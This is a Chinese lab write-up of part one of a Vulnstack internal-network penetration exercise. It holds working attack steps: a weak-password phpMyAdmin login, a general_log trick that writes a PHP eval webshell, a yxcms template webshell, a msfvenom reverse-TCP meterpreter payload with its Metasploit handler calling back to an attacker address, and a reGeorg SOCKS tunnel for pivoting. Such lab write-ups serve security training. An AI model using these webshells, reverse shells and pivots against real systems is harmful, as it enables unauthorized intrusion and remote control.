Vulnstack 内网渗透(一)

环境介绍

攻击机为kali和win7的外网ip为同一网段

环境搭建过程就不在过多解释,可以看图理解

信息收集

我们拿到ip之后先nmap收集一波,可以查看出开放的端口和服务

开放的80和3306端口 看到开放了3306就想到了phpmyadmin服务,尝试下发现真的存在

测试root root弱口令成功登陆

可尝试使用file_into或日志写入webshell。

代码语言:javascript
复制
into写入文件:
使用需看要secure_file_priv的值。
当value为“null”时,不允许读取任意文件
当value为“空”时,允许读取任意文件
value可也已设置为其他路径。

可通过日志进行getshell

漏洞利用

上述分析后 发现直接无法写入,所以利用全局变量general_log去getshell

代码语言:javascript
复制
set global general_log=on; 开启日志
代码语言:javascript
复制
set global general_log_file='C:/phpstudy/www/ly0n.php'; 设置日志位置为根目录下

写入一句话马进行getshell

代码语言:javascript
复制
select '<?php @eval($_POST["ly0n"]); ?>'

然后取直接访问这个文件

使用蚁剑连接

getshell 后发现在根目录下存在yxcms 访问目录

根据前台提供信息能够进入后台管理页面

百度得到该版本yxcms存在后台模版漏洞

我们在后台修改前台模版的代码,插入一句话

然后蚁剑连接

初探内网

蚁剑连接后开始进行下一步的操作 发现是admin权限的用户

通过前面的扫描端口可知开放了 3306,80端口

3306我们已经看到phpmyadmin,所以我们可以反弹shell

使用kali的msfvenom 生成exe文件

代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.129 LPORT=9999 -f exe -o /home/ly0n/ly0n.exe

通过蚁剑上传到目标机器

利用蚁剑运行 在kali 设置监听得到会话

代码语言:javascript
复制
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.110.129
set lport 9999
exploit

目标机器为win7 可以输入shell进入终端 通过ipconfig可以看到存在另外一个网段

横向渗透

这里采用reGeorg来实现内网转发

将该工具里面的tunnel.nosocket.php上传到网站目录下(不要根目录)

访问出现如下

然后配置我们的服务

代码语言:javascript
复制
sudo python reGeorgSocksProxy.py -u http://192.168.110.143/yxcms/tunnel.nosocket.php -p 9999

然后再去访问192.168.102.138

后续漏洞利用暂时未做